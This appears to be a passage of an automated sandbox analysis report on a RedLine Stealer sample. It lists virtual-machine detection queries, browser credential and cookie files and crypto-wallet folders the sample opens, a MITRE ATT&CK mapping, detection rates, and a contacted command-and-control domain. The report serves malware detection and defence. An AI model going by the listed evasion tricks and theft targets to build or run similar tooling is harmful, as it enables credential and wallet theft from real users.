            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_000B6F6C push esi; iretd
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_000B56DF push 00000004h; iretd
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009039CC push ss; ret
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00904C97 push esi; iretd
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043BB180 push cs; ret
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0D2EEF40 push ecx; ret
            Source: initial sampleStatic PE information: section name: vMF<; entropy: 7.99898892703
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWindow / User API: threadDelayed 1175
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWindow / User API: threadDelayed 7520
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\7d9bXpW0im.exe TID: 5576Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeThread delayed: delay time: 922337203685477
            Source: 7d9bXpW0im.exe, 00000001.00000002.262130265.000000000E72D000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: 7d9bXpW0im.exe, 00000001.00000002.262130265.000000000E72D000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware4OEY_54OWin32_VideoController8UG9S
            Source: 7d9bXpW0im.exe, 00000001.00000002.262093087.000000000E70E000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware4OEY_54OWin32_VideoController8UG9SXA3VideoController120060621000000.000000-00008697421display.infMSBD:L
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Users\user\Desktop\7d9bXpW0im.exe VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information:

            barindex
            Yara detected RedLine StealerShow sources
            Source: Yara matchFile source: 1.2.7d9bXpW0im.exe.9d70000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 7d9bXpW0im.exe PID: 3440, type: MEMORYSTR
            Yara detected RedLine StealerShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Tries to steal Crypto Currency WalletsShow sources
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: Yara matchFile source: Process Memory Space: 7d9bXpW0im.exe PID: 3440, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected RedLine StealerShow sources
            Source: Yara matchFile source: 1.2.7d9bXpW0im.exe.9d70000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 7d9bXpW0im.exe PID: 3440, type: MEMORYSTR
            Yara detected RedLine StealerShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection1Masquerading1OS Credential Dumping1Security Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery11Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion231Security Account ManagerVirtualization/Sandbox Evasion231SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing12Cached Domain CredentialsSystem Information Discovery123VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            7d9bXpW0im.exe30%VirustotalBrowse
            7d9bXpW0im.exe31%MetadefenderBrowse
            7d9bXpW0im.exe54%ReversingLabsByteCode-MSIL.Packed.Confuser
            7d9bXpW0im.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.7d9bXpW0im.exe.90000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            victairatu.xyz1%VirustotalBrowse
            api.ip.sb2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://service.r0%URL Reputationsafe
            http://victairatu.xyz40%Avira URL Cloudsafe
            http://victairatu.xyz1%VirustotalBrowse
            http://victairatu.xyz0%Avira URL Cloudsafe
            http://victairatu.xyz4/l0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
            http://tempuri.org/t_0%Avira URL Cloudsafe
            http://victairatu.xyz:80/0%Avira URL Cloudsafe
            https://api.ip.sb/geoip0%URL Reputationsafe
            http://victairatu.xyz/0%Avira URL Cloudsafe
            http://tempuri.org/0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
            http://go.micros0%URL Reputationsafe
            http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
            https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
            http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
            http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
            http://tempuri.org/00%Avira URL Cloudsafe
            http://support.a0%URL Reputationsafe
            http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
            http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
            https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
            https://helpx.ad0%URL Reputationsafe
            http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
            https://get.adob0%URL Reputationsafe
            http://forms.rea0%URL Reputationsafe
            http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
            https://api.ip.sb4/l0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            victairatu.xyz
            141.136.0.194
            truetrueunknown
            api.ip.sb
            unknown
            unknownfalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://victairatu.xyz/false
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtab7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
              high
              http://service.r7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://victairatu.xyz47d9bXpW0im.exe, 00000001.00000002.257942560.00000000024E1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://victairatu.xyz7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/ac/?q=7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000003.250811151.000000000E791000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                high
                https://support.google.com/chrome/?p=plugin_wmp7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                  high
                  https://support.google.com/chrome/answer/62587847d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                    high
                    http://victairatu.xyz4/l7d9bXpW0im.exe, 00000001.00000002.258017733.000000000257C000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/Endpoint/EnvironmentSettings7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/t_7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://victairatu.xyz:80/7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.ip.sb/geoip7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/envelope/7d9bXpW0im.exe, 00000001.00000002.257668290.0000000002370000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpfalse
                      high
                      https://support.google.com/chrome/?p=plugin_flash7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/soap/envelope/D7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpfalse
                          high
                          http://tempuri.org/7d9bXpW0im.exe, 00000001.00000002.257668290.0000000002370000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://support.google.com/chrome/?p=plugin_java7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                            high
                            http://tempuri.org/Endpoint/VerifyUpdateResponse7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://go.micros7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://tempuri.org/Endpoint/SetEnvironment7d9bXpW0im.exe, 00000001.00000002.257942560.00000000024E1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpoint/SetEnvironmentResponse7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultx)47d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                              high
                              http://tempuri.org/Endpoint/GetUpdates7d9bXpW0im.exe, 00000001.00000002.258017733.000000000257C000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000002.257698432.000000000239F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://support.google.com/chrome/?p=plugin_real7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                high
                                https://api.ipify.orgcookies//settinString.Removeg7d9bXpW0im.exe, 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.interoperabilitybridges.com/wmp-extension-for-chrome7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://support.google.com/chrome/?p=plugin_pdf7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                  high
                                  https://support.google.com/chrome/?p=plugin_divx7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                    high
                                    http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                      high
                                      http://tempuri.org/Endpoint/VerifyUpdate7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://tempuri.org/07d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                        high
                                        http://forms.real.com/real/realone/download.html?type=rpsp_us7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                          high
                                          http://support.a7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ipinfo.io/ip%appdata%7d9bXpW0im.exe, 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpfalse
                                            high
                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                              high
                                              https://support.google.com/chrome/?p=plugin_quicktime7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                                high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://tempuri.org/Endpoint/CheckConnectResponse7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.datacontract.org/2004/07/7d9bXpW0im.exe, 00000001.00000002.257942560.00000000024E1000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%7d9bXpW0im.exe, 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://helpx.ad7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000003.250811151.000000000E791000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                                                      high
                                                      http://tempuri.org/Endpoint/CheckConnect7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
